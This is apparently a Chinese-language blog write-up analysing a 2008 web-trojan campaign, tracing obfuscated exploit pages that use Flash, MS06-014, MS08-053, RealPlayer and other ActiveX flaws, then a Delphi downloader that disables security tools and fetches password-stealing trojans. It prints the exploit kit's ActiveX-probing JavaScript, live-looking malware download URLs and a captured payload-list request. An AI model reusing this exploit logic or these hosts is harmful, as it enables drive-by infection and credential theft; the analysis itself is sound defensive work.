第一行是真正网马的地址,第二行是一个51la的统计代码,看来挂马的家伙还是很关注统计数据的

继续跟踪http://www.dns1999.cn/d3/123.htm

查看源码,是加密后的网页木马

加密的代码看着都头疼,不过不要紧,有强大的工具,我们有Firefox的firebug插件可以很轻松的就看到了网页木马的源代码

呵呵,又是混合类型的网马,利用了多种漏洞来攻击

document.write("<iframewidth=20 height=0 src=flash.htm></iframe>");

这个是flash文件溢出漏洞,继续跟下去

设置了cookie,判断浏览器的版本,如果是IE浏览器的话定向到ie的溢出链接ifl.html,不是IE的话定向到ffl.html,继续跟踪一下ifl.html吧

这个溢出判断了flash的版本,一个比较老的漏洞了,网上分析的也都比较透彻,也就不多说了.

我们来看一下下载者的地址是多少,分析swf文件是很累人而且不讨好的事情,我们用比较简单的方法来获取下载者的地址,就是在虚拟机里面布置一个有漏洞的环境然后抓包得到下载者的地址,我的虚拟机的flash插件版本是115版的,正好是有漏洞的版本.

这样就抓到了挂马的下载者的地址

http://yang3535234.3322.org/ok.exe

先不急着分析下载者,我们回头看一下其它的网马

document.write("<iframe width=20 height=0src=14.htm></iframe>"); //MS06014漏洞

document.write("<iframewidth=100 height=0 src=as.htm></iframe>");  //这个不熟悉,百度了一下是9月10日milw0rm.com公布的MS08-053Windows Media Encoder wmex.dll ActiveX Control Buffer Overflow

(http://milw0rm.com/exploits/6454)

try{var f;

9var gg=newActiveXObject("GLIEDown.IEDown.1");}

10catch(f){};

11finally{if(f!="[objectError]"){document.write("<iframe width=100 height=0src=lz.htm></iframe>");}}                                                //联众

try{var m;

13var hh=newActiveXObject("Downloader.DLoader.1");}

14catch(m){};

15finally{if(m!="[objectError]"){document.write("<iframewidth=100 height=0src=sina.htm></iframe>");}}                                 //新浪视频

try{var n;

17var ll=newActiveXObject("xxxxxxx");}

18catch(n){};

19finally{if(n!="[objectError]"){document.write("<iframewidth=100 height=0src=office.htm></iframe>");}}             //office

try{var b;

21var mm=newActiveXObject("NCTAudioFile2.AudioFile2.2");}

22catch(b){};

23finally{if(b!="[objectError]"){document.write("<iframe width=100 height=0src=NCTAudioFile.htm></iframe>");}}

//NCTAudioFile,这个漏洞的网马不是很熟悉

function test()

25{

26rrooxx = "IER"+ "PCtl.I" + "ERP" + "Ctl.1";

27try

28{

29Like = newActiveXObject(rrooxx);

30}catch(error){return;}

31vvvvv =Like.PlayerProperty("PRODUCTVERSION");

32if(vvvvv<="6.0.14.552")

33document.write("<iframewidth=100 height=0 src=re10.htm></iframe>");

34else

35document.write("<iframewidth=100 height=0 src=re11.htm></iframe>");

36}

//这个则是RealPlayer的ax漏洞挂马利用

跟踪一下http://www.dns1999.cn/d3/as.htm 也就是利用了MS08-053挂马的页面

Shellcode 我用coderui大侠的小工具转换成十六进制码

然后就可以复制到OD里面进行调试这段shellcode,这个就不写了

现在来分析刚才抓到的downloaderhttp://yang3535234.3322.org/ok.exe

用FSGv2.0 -> bart/xt 加壳的,直接FFI脱壳,然后ollydbg载入看字符串,

Delphi写的下载者

呵呵,很有可能是可以通过局域网IPC弱口令传播

要对安全软件干坏事了

写批处理自删除的代码

系统版本的判断和U盘传播的代码

禁用了任务管理器,对安全软件进行映像劫持

修改首页,破坏安全模式

下面的应该是加密的配置的部分,牛X牛X下载者

映像劫持,修改首页,回传统计数据

这个下载者很好笑,把需要映像劫持的安全软件的进程名称都反着写

在虚拟机里面继续用sniffer抓包

发现下载大量的盗号木马,下载者连接www.windows1995.cn/1995.txt,读取内容下载木马

GET /1995.txt HTTP/1.1

User-Agent: InetURL:/1.0

Host: www.windows1995.cn

Cache-Control: no-cache

HTTP/1.1 200 OK

Content-Length: 1124

Content-Type: text/plain

Last-Modified: Sat, 20 Sep 2008 17:17:37 GMT

Accept-Ranges: bytes

ETag: W/"4e2e8cc7441bc91:4d2"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Date: Sat, 20 Sep 2008 17:49:05 GMT

http://www.windows1995.cn/game/meng.exe

http://www.76vp.cn/jj2.exe

http://www.windows1995.cn/game/loutl.exe

http://www.windows1995.cn/game/wow1.exe

http://www.windows1995.cn/game/my.exe

http://www.windows1995.cn/game/zx.exe

http://www.windows1995.cn/game/wl.exe

http://www.windows1995.cn/game/kd.exe

http://www.windows1995.cn/game/fy.exe

http://www.windows1995.cn/game/ct.exe

http://www.windows1995.cn/game/fs.exe

http://www.windows1995.cn/game/zf.exe

http://www.windows1995.cn/game/wen.exe

http://www.windows1995.cn/game/dj.exe

http://www.windows1995.cn/game/cs.exe

http://www.windows1995.cn/game/cq6.exe

http://www.592games.cn/123/1076.exe

http://www.592games.cn/123/game/zt.exe

http://www.592games.cn/123/game/wen2.exe

http://www.592games.cn/123/gam

剩下的就不分析了,睡觉去,这个就是最近相当流行的修改首页为3929.cn的木马~